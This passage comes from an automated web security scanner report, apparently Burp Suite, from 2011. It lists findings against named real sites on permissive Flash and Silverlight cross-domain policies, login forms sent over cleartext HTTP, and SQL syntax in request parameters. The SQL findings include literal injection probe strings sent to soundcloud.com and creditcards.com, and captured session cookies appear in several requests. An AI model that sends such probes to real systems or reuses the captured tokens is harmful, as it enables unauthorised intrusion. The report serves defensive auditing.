Date: Fri, 17 Jun 2011 10:45:19 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

4.113. http://creditcards.citicards.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: creditcards.citicards.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server:
Date: Fri, 17 Jun 2011 10:40:27 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

4.114. http://ilslaunch.app2.hubspot.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ilslaunch.app2.hubspot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ilslaunch.app2.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:1045a"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 10:51:03 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 15 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ads.pointroll.com/clientaccesspolicy.xml
http://ads1.msn.com/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://cctrkom.creditcards.com/clientaccesspolicy.xml
http://metrics.citibank.com/clientaccesspolicy.xml
http://oimg.nbcuni.com/clientaccesspolicy.xml
http://om.dowjoneson.com/clientaccesspolicy.xml
http://rmd.atdmt.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://spe.atdmt.com/clientaccesspolicy.xml
http://wasc.homedepot.com/clientaccesspolicy.xml
http://media.cnbc.com/clientaccesspolicy.xml
http://www.cnbc.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Thu, 16 Jun 2011 11:22:22 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1722"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 16 Jun 2011 13:13:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://ads1.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:25:58 GMT
Expires: Wed, 13 Jun 2012 08:33:00 GMT
Last-Modified: Fri, 01 Apr 2011 20:58:23 GMT
Cache-Control: max-age=31536000
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Content-Length: 348
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>

...[SNIP]...

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 17 Jun 2011 10:51:03 GMT
Date: Thu, 16 Jun 2011 10:51:03 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 17 Jun 2011 12:51:27 GMT
Date: Thu, 16 Jun 2011 12:51:27 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.6. http://cctrkom.creditcards.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:35 GMT
Server: Omniture DC/2.0.0
xserver: www647
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://metrics.citibank.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:38 GMT
Server: Omniture DC/2.0.0
xserver: www12
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://oimg.nbcuni.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oimg.nbcuni.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:26:25 GMT
Server: Omniture DC/2.0.0
xserver: www255
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://om.dowjoneson.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://om.dowjoneson.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:22 GMT
Server: Omniture DC/2.0.0
xserver: www27
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.10. http://rmd.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rmd.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rmd.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Thu, 23 Jun 2011 15:31:23 GMT
Date: Thu, 16 Jun 2011 15:31:26 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:21 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 23 Jun 2011 11:22:21 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.12. http://spe.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Tue, 21 Jun 2011 17:45:55 GMT
Date: Thu, 16 Jun 2011 15:31:26 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.13. http://wasc.homedepot.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wasc.homedepot.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wasc.homedepot.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:39 GMT
Server: Omniture DC/2.0.0
xserver: www30
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.14. http://media.cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1330
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close
Cache-Control: public, max-age=900

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.15. http://www.cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:24:41 GMT
Via: 1.1 C aicache6
Content-Length: 1330
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 11:25:41 GMT

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

6. Cleartext submission of password previous next
There are 3 instances of this issue:

/article/SB10001424052702303714704576384051388321740.html
/article/SB10001424052702303714704576384051388321740.html
/home-page

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052702303714704576384051388321740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://commerce.wsj.com/auth/submitlogin

The form contains the following password field:

password

Request

GET /article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_U.S.%252520Home_0_0_WH_0001_public%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702303714704576384051388321740.html%25253Fmod%25253DWSJ_hp_mostpop_re%2526ot%253DA

Response

6.2. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052702303714704576384051388321740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read

The form contains the following password fields:

passwordReg
passwordConfirmationReg

Request

Response

6.3. http://online.wsj.com/home-page previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/home-page

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://commerce.wsj.com/auth/submitlogin

The form contains the following password field:

password

Request

GET /home-page HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DInfogrfx%252520Slide%252520Show_SB10001424052702303714704576384051388321740%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/home-page%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:07 GMT
Server: Apache/2.0.58 (Unix)
Cache-Control: no-cache, no-store
FastDynaPage-ServerInfo: sbkj2kapachep09 - Thu 06/16/11 - 07:23:27 EDT
Cache-Control: max-age=15
Expires: Thu, 16 Jun 2011 11:24:22 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 159431
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

7. SQL statement in request parameter previous next
There are 3 instances of this issue:

https://soundcloud.com/login
http://www.creditcards.com/oc/
http://www.nutter.com/attorneys.php

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

7.1. https://soundcloud.com/login previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://soundcloud.com
Path:	/login

Request

GET /login?ref=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: soundcloud.com
Cookie: _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTUxM2Y1ZDI4MGQ1MTEyNjY5M2Q2MDE2MjJhYTg0YzM%3D--e3be32573ecff26f8db9f20c4ec4e72903f6cc5b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 19:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Runtime: 22
ETag: "1738f742fd61dd7dd8b6aeb39b674fd3"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlMmQxMDcwOWFjNTFlZmZmM2M1ZTk2NjAyNDE4N2VkMDY%3D--c1dc1f0a108fdc452a48ab25f420ad86c995061c; domain=soundcloud.com; path=/; HttpOnly
Vary: Accept-Encoding,
Content-Length: 20960

<!DOCTYPE html>
<html><head><meta charset="utf-8" />
<title>Log In on SoundCloud - Create, record and share your sounds for free</title>
<meta content="record, sounds, share, sound, audio, tracks, mus
...[SNIP]...

7.2. http://www.creditcards.com/oc/ previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.creditcards.com
Path:	/oc/

Request

GET /oc/?pid=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&pg=1477&pgpos=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:09 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705430940961583&data3=0&sid=1889&c=%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29
Vary: Accept-Encoding
Content-Length: 3050
Content-Type: text/html
Set-Cookie: cardOfferHistory=deleted; expires=Thu, 17-Jun-2010 10:43:08 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

7.3. http://www.nutter.com/attorneys.php previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.nutter.com
Path:	/attorneys.php

Request

